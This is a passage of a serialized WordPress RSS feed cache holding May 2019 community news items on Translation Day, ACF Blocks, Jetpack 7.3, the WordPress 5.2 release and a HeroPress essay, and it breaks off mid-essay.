4";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6961";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:75:"https://wordpress.org/news/2019/05/tomorrow-is-wordpress-translation-day-4/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3701:"<p><em>The fourth edition of WordPress translation day is coming up on Saturday 11 May 2019: tomorrow! Get ready for a 24-hour, global marathon dedicated to localizing the WordPress platform and ecosystem.</em> <em>This event takes place both online and in physical locations across the world, so you can join no matter where you are! </em></p>\n\n\n\n<p>The <a href="https://make.wordpress.org/polyglots/">WordPress Polyglots Team</a> has a mission to translate and make available the software’s features into as many languages as possible. As WordPress powers more than 33% of websites, people from across the world use it in their daily life. That means there is a lot that needs translating, and into many different languages. </p>\n\n\n\n<p>On 11 May 2019, from 00:00 UTC until 23:59 UTC, <a href="https://wptranslationday.org/">WordPress Translation Day</a> aims to celebrate the thousands of volunteers who contribute to translation and internalization. The event is also an opportunity for encouraging more people to get involved and help increase the availability of themes and plugins in different languages.</p>\n\n\n\n<blockquote><p>&#8220;At the time of the last event in 2017, WordPress was being translated into 178 languages, we have now reached the 200 mark!&#8221;</p><cite>WPtranslationday.org</cite></blockquote>\n\n\n\n<h2>What happens on WordPress Translation Day?</h2>\n\n\n\n<p>There are a number of <a href="https://wptranslationday.org/the-local-events/">local meetings all over the world</a>, as well as online talks by people from the WordPress community. More than 700 people from around the world took part in past WordPress Translation Days, and everyone welcome to join in this time around!</p>\n\n\n\n<p>Everyone is welcome to join the event to help translate and localize WordPress, no matter their level of experience. A lot is happening on the day, so join in and you will learn how to through online sessions!</p>\n\n\n\n<h3>What can you expect?</h3>\n\n\n\n<ul><li><strong>Live online training</strong>: Tutorials in different languages focused on translation and <em>localization</em>, or l10n, of WordPress. These are streamed in multiple languages</li><li><strong>Localization sessions</strong>: General instruction and specifics for particular areas and languages. These sessions are streamed in multiple languages.</li><li><strong>Internalization sessions</strong>: Tutorials about optimizing the code to ease localization processes, also called <em>internationalization</em> or i18n. These sessions are streamed in English.</li><li><strong>Local events</strong>: Polyglot contributors will gather around the world for socializing, discussing, and translating together.</li><li><strong>Remote events</strong>: Translation teams that cannot gather physically, will connect remotely. They will be available for training, mentoring, and supporting new contributors. They will also engage in &#8220;translating marathons&#8221;, in which existing teams translate as many strings as they can!</li></ul>\n\n\n\n<p>A number of experienced WordPress translators and internationalization experts are part of the line-up for the livestream, joined by some first time contributors. </p>\n\n\n\n<p>Whether you have or haven&#8217;t contributed to the Polyglots before, you can join in for WordPress Translation Day. Learn more about both local and online events and stay updated through the website and social media. </p>\n\n\n\n<ul><li><a href="https://wptranslationday.org/">WordPress Translation Day website</a></li><li><a href="https://twitter.com/translatewp">WordPress Translation Day Twitter</a></li><li><a href="https://www.facebook.com/WPTranslationDay/">WordPress Translation Day Facebook</a></li></ul>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 10 May 2019 09:17:48 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Joost de Valk";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:37;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:107:"WPTavern: Advanced Custom Fields 5.8.0 Introduces ACF Blocks: A PHP Framework for Creating Gutenberg Blocks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89325";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:117:"https://wptavern.com/advanced-custom-fields-5-8-0-introduces-acf-blocks-a-php-framework-for-creating-gutenberg-blocks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3548:"<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2019/05/acf-blocks.jpg?ssl=1"><img /></a></p>\n<p>After six months in development, <a href="https://www.advancedcustomfields.com/blog/acf-5-8-0-release-php-blocks-for-gutenberg/" rel="noopener noreferrer" target="_blank">Advanced Custom Fields 5.8.0</a> was released yesterday with a new PHP-based framework for developing custom Gutenberg block types. ACF Blocks was announced in October 2018, to the great relief of many developers who didn&#8217;t know how they were going to keep pace with learning the JavaScript required to use WordPress&#8217; Block API. </p>\n<p>ACF&#8217;s creator, Elliot Condon, was one of the more vocal critics of Gutenberg leading up to its inclusion in WordPress 5.0. Developers were concerned about whether or not their custom metaboxes generated by ACF would still be compatible. The ACF team worked to ensure the plugin was integrated into the Gutenberg UI as much as possible and surprised users by announcing an acf_register_block() function that would allow developers to use PHP to create custom blocks.</p>\n<p>The new ACF Blocks add-on is built on top of Advanced Custom Fields Pro and does not require any JavaScript knowledge. It integrates with custom fields so developers can create custom solutions. ACF blocks are rendered using a PHP template file or a callback function that allows full control of the output HTML and live previews while editing the blocks. They also maintain native compatibility with WordPress core, meaning that all Gutenberg features like &#8220;alignment&#8221; and &#8220;re-usable blocks&#8221; work as expected.</p>\n<p>Early feedback indicates that ACF Blocks has made custom Gutenberg development more approachable for developers who are not as well-versed in React, significantly speeding up the creation of custom blocks.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">ACF Pro 5.8 for <a href="https://twitter.com/hashtag/WordPress?src=hash&ref_src=twsrc%5Etfw">#WordPress</a> makes Gutenberg block development a breeze! Here''s a staff block I made in less than 30 mins. <a href="https://twitter.com/wp_acf?ref_src=twsrc%5Etfw">@wp_acf</a> <a href="https://twitter.com/hashtag/ACFBlocks?src=hash&ref_src=twsrc%5Etfw">#ACFBlocks</a> <a href="https://twitter.com/hashtag/wordpressdeveloper?src=hash&ref_src=twsrc%5Etfw">#wordpressdeveloper</a> <a href="https://twitter.com/hashtag/Gutenberg?src=hash&ref_src=twsrc%5Etfw">#Gutenberg</a> <a href="https://twitter.com/hashtag/reactjs?src=hash&ref_src=twsrc%5Etfw">#reactjs</a> <a href="https://twitter.com/hashtag/webdevelopment?src=hash&ref_src=twsrc%5Etfw">#webdevelopment</a> <a href="https://twitter.com/hashtag/webdeveloper?src=hash&ref_src=twsrc%5Etfw">#webdeveloper</a> <a href="https://t.co/VqewoKkcSt">pic.twitter.com/VqewoKkcSt</a></p>\n<p>&mdash; Sam (@sam_kent_) <a href="https://twitter.com/sam_kent_/status/1126468039917080577?ref_src=twsrc%5Etfw">May 9, 2019</a></p></blockquote>\n<p></p>\n<p>This is one example of how the WordPress product ecosystem continues to evolve to support developers in the transition to a more JavaScript-powered WordPress.</p>\n<p>ACF Blocks also launched with a suite of nine ready-to-use bocks available as a plugin from the new <a href="https://acfblocks.com/" rel="noopener noreferrer" target="_blank">acfblocks.com</a> website. These include commonly-requested functionality for client sites, such as testimonial, team, multi-button, star-rating, pricing list, and click-to-tweet, with more on the way. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 09 May 2019 18:14:36 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:38;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:79:"WPTavern: WPWeekly Episode 351 – Results of the Gutenberg Accessibility Audit";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:59:"https://wptavern.com/?p=89460&preview=true&preview_id=89460";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:86:"https://wptavern.com/wpweekly-episode-351-results-of-the-gutenberg-accessibility-audit";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1904:"<p>In this episode, <a href="http://jjj.me">John James Jacoby</a> and I are joined by <a href="https://bamadesigner.com/">Rachel Cherry</a>, <span class="css-76zvg2 css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0" dir="auto">Freelance software engineer, consultant,</span> and director of <a href="https://wpcampus.org/">WPCampus</a> and Brian DeConinck, a front-end designer and developer with the <a href="https://design.oit.ncsu.edu/">OIT Design and Web Services</a> team, part of the <a href="https://oit.ncsu.edu/">Office of Information Technology</a> at <a href="https://www.ncsu.edu/">NC State University</a>.</p>\n<p>We learn how Tenon was chosen as the vendor to perform the audit and what conditions needed to be met. We then dissected the results of the <a href="https://wpcampus.org/2019/05/gutenberg-audit-results/">Gutenberg Accessibility Audit</a> conducted by <a href="https://tenon.io/">Tenon</a>. We discuss the state of Gutenberg&#8217;s accessibility, recommendations for those in Higher Education environments, and where Gutenberg development might go from here.</p>\n<h2>Transcript:</h2>\n<p><a href="https://wptavern.com/wp-content/uploads/2019/05/WPWeeklyEpisode351Transcript.rtf">WPWeeklyEpisode351Transcript</a></p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, May 15th 3:00 P.M. Eastern</p>\n<p>Subscribe to <a href="https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738">WordPress Weekly via Itunes</a></p>\n<p>Subscribe to <a href="https://www.wptavern.com/feed/podcast">WordPress Weekly via RSS</a></p>\n<p>Subscribe to <a href="http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr">WordPress Weekly via Stitcher Radio</a></p>\n<p>Subscribe to <a href="https://play.google.com/music/listen?u=0#/ps/Ir3keivkvwwh24xy7qiymurwpbe">WordPress Weekly via Google Play</a></p>\n<p><strong>Listen To Episode #351:</strong><br />\n</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 09 May 2019 00:52:26 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:39;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:78:"WPTavern: WordPress Professionals: Take the Future of WordPress Careers Survey";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89447";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:88:"https://wptavern.com/wordpress-professionals-take-the-future-of-wordpress-careers-survey";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2868:"<p>Nevena Tomovic, a Business Developer at Human Made, is researching the most important skills for pursuing a career in WordPress. She is conducting a <a href="http://nevena.blog/2019/04/27/open-source-survey-the-future-of-wordpress-careers/" rel="noopener noreferrer" target="_blank">survey</a> for professionals that is open to anyone working in a WordPress-related capacity, including writers, developers, marketers, UI &#038; UX designers, illustrators, community drivers, evangelists, project managers, and creatives.</p>\n<p>The <a href="http://nevena.blog/2019/04/27/open-source-survey-the-future-of-wordpress-careers/" rel="noopener noreferrer" target="_blank">survey</a> takes less than five minutes to complete and the results will be shared at WordCamp Europe in Berlin and on <a href="http://nevena.blog" rel="noopener noreferrer" target="_blank">nevena.blog</a>. Tomovoic will be giving a presentation titled &#8220;<a href="https://2019.europe.wordcamp.org/session/renaissance-jobs-in-wordpress-skills-you-need-to-survive-the-21st-century-career/" rel="noopener noreferrer" target="_blank">Renaissance jobs in WordPress: Skills you need to survive the 21st-century career</a>,&#8221; where she will elaborate on global trends related to the job landscape. She will also be speaking about how employers and managers can attract new talent through WordPress education.</p>\n<p>In a recent <a href="http://nevena.blog/2019/04/27/renaissance-jobs-in-digital-what-skills-do-you-need-to-survive-a-21st-century-career/" rel="noopener noreferrer" target="_blank">post</a> on her blog, Tomovic elaborated on the concept of &#8220;Renaissance jobs,&#8221; positions that use titles merging multiple skills into one role:</p>\n<blockquote><p>Renaissance jobs, also otherwise known as hybrid roles are a mishmash of more than one skill, a combination of expertise in more than one domain. You might have come across roles such as experience architect, user experience consultant, or even customer wrangler, all of these typically involve technical knowledge, excellent communication and management skills. All of these roles are a completely foreign concept for most of our parents. The 21st century has brought with it remote work, chief growth officers, and a globalized workforce among other things.</p></blockquote>\n<p>Tomovic&#8217;s survey data will identify what skills are most important in the WordPress job market right now. The survey does not collect any personal data and the raw data will be deleted after the results are published. </p>\n<p>If you want to check out Tomovic&#8217;s talk in person, make sure to <a href="https://2019.europe.wordcamp.org/tickets/" rel="noopener noreferrer" target="_blank">purchase a ticket</a> to WordCamp Europe. The final batch of tickets has gone on sale and there are only 133 general admission tickets remaining.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 08 May 2019 23:24:57 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:40;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:97:"WPTavern: New Membership Block Coming to Jetpack, Site Health and Debug Info Added to Version 7.3";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89387";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:107:"https://wptavern.com/new-membership-block-coming-to-jetpack-site-health-and-debug-info-added-to-version-7-3";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3382:"<p><a href="https://jetpack.com/2019/05/07/jetpack-7-3start-strong-and-stay-healthy/" rel="noopener noreferrer" target="_blank">Jetpack 7.3</a> was released yesterday with changes that improve the “out of the box” experience. The plugin now enables fewer features on setup so users can have more control over what they activate on their sites.  </p>\n<p>The new version also integrates with WordPress 5.2&#8217;s new Site Health checks. It includes a status check and moves Jetpack&#8217;s legacy debug data to a section in the new &#8220;Site Health Info&#8221; tab. The initial status check isn&#8217;t very descriptive regarding critical errors, but these error messages can be improved in future iterations so users know how to get to a page with more information. </p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2019/05/Screen-Shot-2019-05-08-at-11.57.44-AM.png?ssl=1"><img /></a></p>\n<h3>New Membership Block Now Available for Jetpack Beta Testers</h3>\n<p>Jetpack is getting ready to introduce a new <a href="https://github.com/Automattic/jetpack/pull/9802" rel="noopener noreferrer" target="_blank">Membership block</a> that will essentially function like a recurring donation button using Stripe as the payment gateway. </p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2019/05/jetpack-membership-button.png?ssl=1"><img /></a></p>\n<p>Users will be able to set the currency, price, product name, and renewal interval directly within the block.</p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2019/05/membership-block-configure.png?ssl=1"><img /></a></p>\n<p>This release adds the new block behind the JETPACK_BETA_BLOCKS constant for users who are beta testing new blocks. Feedback from testers will be addressed in future pull requests. The PR merged into Jetpack 7.3 includes the following technical additions for the new Membership block:</p>\n<ul>\n<li>Introduce endpoints that communicate with WP.COM</li>\n<li>Whitelist certain options, CPTs and meta to store / sync data</li>\n<li>Introduce Gutenberg block that uses these endpoints and provides UI to connect to Stripe, create and choose a product</li>\n<li>Introduce a frontend of a block with the sole purpose of displaying a checkout window from WP.com in an iframe</li>\n</ul>\n<p>In its current form, the use of the term &#8220;Membership&#8221; for the block might be a bit misleading for some users, depending on their expectations. Site owners usually expect more granular management of members, multiple membership tiers, customizable emails, various renewal options, content access, and more for managing memberships. </p>\n<p>Unless Jetpack intends to make this the gateway to more robust membership capabilities, then &#8220;Recurring donation/payment button&#8221; might be a more accurate name for the block. However, it wouldn&#8217;t be surprising to see a more full-featured Membership module turn up as a SaaS product from WordPress.com, as opposed to everything getting packed into the plugin.</p>\n<p>No release date has been announced for the membership block as it is still under active development and in the very early stages of beta testing.</p>\n<p>Check out the full <a href="https://wordpress.org/plugins/jetpack/#developers" rel="noopener noreferrer" target="_blank">changelog</a> to see all the enhancements and bug fixes in Jetpack 7.3.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 08 May 2019 17:57:43 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:41;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:100:"WPTavern: WordPress 5.2 “Jaco” Released, Includes Fatal PHP Error Protection and A Recovery Mode";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89405";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:104:"https://wptavern.com/wordpress-5-2-jaco-released-includes-fatal-php-error-protection-and-a-recovery-mode";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4870:"<p>WordPress 5.2 &#8220;Jaco&#8221; named after bassist <a href="https://en.wikipedia.org/wiki/Jaco_Pastorius">Jaco Pastorius</a>, is <a href="https://wordpress.org/news/2019/05/jaco/">now available for download</a>. Normally, I&#8217;d start listing new features but I&#8217;m going to do something a little different this time. </p>\n\n\n\n<p>Let&#8217;s begin by recognizing the 327 people who contributed to this release with 109 of those being first time contributors. It was led by&nbsp;<a href="http://ma.tt/">Matt Mullenweg</a>, <a href="https://josepha.blog/">Josepha Haden Chomphosy</a>, and&nbsp;<a href="https://pento.net/">Gary Pendergast</a>. Included in the list is Alex (Viper007Bond) Mills who <a href="https://wptavern.com/alex-mills-ends-his-battle-with-leukemia">passed away</a> from Leukemia earlier this year.</p>\n\n\n\n<div class="wp-block-image"><img />Screenshot taken by <a href="https://twitter.com/Kraft/status/1125892606913855489">Brandon Kraft</a></div>\n\n\n\n<p>Mills still has a few uncommitted patches in Trac so it&#8217;s possible he&#8217;ll end up on the list of contributors in future releases. </p>\n\n\n\n<h2>Minimum PHP Version Required to Run WordPress 5.2 Is Now 5.6.20</h2>\n\n\n\n<p>WordPress 5.2 bumps up the minimum PHP version required to 5.6.20. If you&#8217;re using an older version, you&#8217;ll need to update PHP before upgrading to WordPress 5.2. Updating PHP to version 7.3 or above <a href="https://wordpress.org/about/requirements/">is recommended</a>. </p>\n\n\n\n<h2>Additional Improvements to Site Health Check </h2>\n\n\n\n<p>In <a href="https://wptavern.com/wordpress-5-1-improves-editor-performance-encourages-users-to-update-outdated-php-versions">WordPress 5.1</a>, Site Health Check features were added to inform users of outdated PHP versions. WordPress 5.2 builds on this foundation by adding two new pages that help debug common configuration issues. Users can find the Site Health section in the WordPress backend by browsing to <strong>Tools &gt; Site Health</strong>. </p>\n\n\n\n<div class="wp-block-image"><img />Site Health Check Test Results</div>\n\n\n\n<p>Browsing to the Site Health page triggers a series of tests. When the tests are performed, errors and recommended improvements are displayed on the  results page. There&#8217;s also a an Information tab that displays every detail about the configuration of your site.</p>\n\n\n\n<div class="wp-block-image"><img />Site Health Check Detailed Information</div>\n\n\n\n<p>Theme and Plugin authors can <a href="https://make.wordpress.org/core/2019/04/25/site-health-check-in-5-2/">add their own tests</a> and modify or remove existing ones with filters. </p>\n\n\n\n<h2>Fatal Error Protection</h2>\n\n\n\n<p>Instead of seeing the dreaded &#8220;white screen of death,&#8221; WordPress 5.2 includes fatal PHP error protection. When a fatal error is detected, a user-facing error message is displayed and an email is sent to the administrator&#8217;s email address. </p>\n\n\n\n<p>The email includes a link to a new feature called &#8220;recovery mode.&#8221; While in recovery mode, plugins and themes that are causing fatal errors are put into a paused state to ensure administrators can work around the errors and access the backend normally. </p>\n\n\n\n<p>In addition to being informed about which themes or plugins are causing fatal errors, administrators have at least three options to fix the issue. </p>\n\n\n\n<ul><li>Administrators can deactivate the theme or plugin to maintain a working version of the site.</li><li>Administrators can fix the problem if they have the technical capabilities, and afterwards reactivate the theme or plugin.</li><li>Administrators can file a support request with the developer, pointing out the error.</li></ul>\n\n\n\n<p>Administrators can exit recovery mode by pressing a button in the admin bar. A few examples on how developers can utilize this feature can be <a href="https://make.wordpress.org/core/2019/04/16/fatal-error-recovery-mode-in-5-2/">found here</a>. </p>\n\n\n\n<p>WordPress 5.2 also includes <a href="https://make.wordpress.org/core/2019/04/24/notable-accessibility-changes-in-5-2/">accessibility improvements</a>, <a href="https://wptavern.com/wordpress-5-2-will-add-13-new-icons-to-the-dashicon-library">thirteen new dashboard icons</a>, plugin compatibility checks, and an variety of <a href="https://make.wordpress.org/core/2019/04/03/whats-new-in-gutenberg-3rd-april/">changes to the block editor</a>. In addition, the Privacy Policy page includes <a href="https://make.wordpress.org/core/2019/04/24/developer-focused-privacy-updates-in-5-2/">four new helpers</a> that make customizing and designing the page easier. </p>\n\n\n\n<p>To learn more about the features in WordPress 5.2 and how to extend or work with them, check out the <a href="https://make.wordpress.org/core/2019/04/16/wordpress-5-2-field-guide/">WordPress 5.2 Field Guide</a>. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 08 May 2019 17:16:34 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:42;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:51:"HeroPress: Broadening My Horizons Through WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:56:"https://heropress.com/?post_type=heropress-essays&p=2805";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:154:"https://heropress.com/essays/broadening-my-horizons-through-wordpress/#utm_source=rss&utm_medium=rss&utm_campaign=broadening-my-horizons-through-wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:12270:"<img width="960" height="480" src="https://s20094.pcdn.co/wp-content/uploads/2020/05/050819-min-1024x512.jpg" class="attachment-large size-large wp-post-image" alt="Pull Quote: I was scared that if I failed to learn what I need to know, I''d be left in the dust." /><p>I’ve been a web designer since 1996. In some ways, it’s hard for me to fathom. Those were the days of Netscape Navigator and table-based page layouts. I wrote every bit of HTML by hand on a seriously-underpowered computer and a tiny monitor. Definitely a far cry from where we are today.</p>\n<p>I was completely self-taught and learned by doing. When I landed my first job as a full-time “webmaster” at my <a href="https://cumberlink.com/">local newspaper</a>, I didn’t even know what Photoshop was (I had been using Microsoft Paint for graphics – feel free to laugh).</p>\n<p>Looking back, I know that I wasn’t a very good designer in those days – but that didn’t matter. I felt lucky to be on the ground floor of an industry that was poised to change the world.</p>\n<h3>An Early Start</h3>\n<p>As an 18-year-old, I was often the youngest person in the office. Sometimes, that led to not being taken seriously by those in charge. Still, I did have a few mentors at the paper who were more than generous with their friendship and advice. It was my first taste of the “real world” – a lesson I sorely needed.</p>\n<p>At the same time, I realized that I wasn’t going to stay there forever. The pay wasn’t very good and the hours weren’t my cup of tea. Most of all, I just felt that I could do better. Just over a year in, I left.</p>\n<p>From there, I spent the next couple of years in various corporate settings – none of which felt very fulfilling. My existence was very much that of a worker bee. Sure, this is what happens when you’re just starting out – but I was too dense to see it that way.</p>\n<p>Again, I had a feeling that there was something else out there for me. But there didn’t seem to be a path to further my career, unless I took it upon myself to do so.</p>\n<p>So, in 1999 I went all-in as a freelancer working from home. While I’ve gone through a few different places to call home in the years since, I’m still here – thanks in great part to WordPress.</p>\n<p>But before I found both the software and community that would change my trajectory, I had to go through some ups and downs.</p>\n<h3>Hitting a Wall</h3>\n<p>Starting my own business at 21 was at once frightening and gratifying. I booked a few steady clients early on, and that provided a much-needed boost in confidence (and revenue). Yet there was also a tremendous amount of responsibility that I wasn’t prepared for. It was another real-world lesson and I had to mature in a hurry.</p>\n<p>As for technology, I upgraded my computer, but not necessarily my approach. The first several years were still ruled by building static HTML sites. And as clients started asking for more complex features such as ecommerce, I realized something about myself: I was incredibly afraid of what I didn’t know.</p>\n<p>This feeling would haunt me 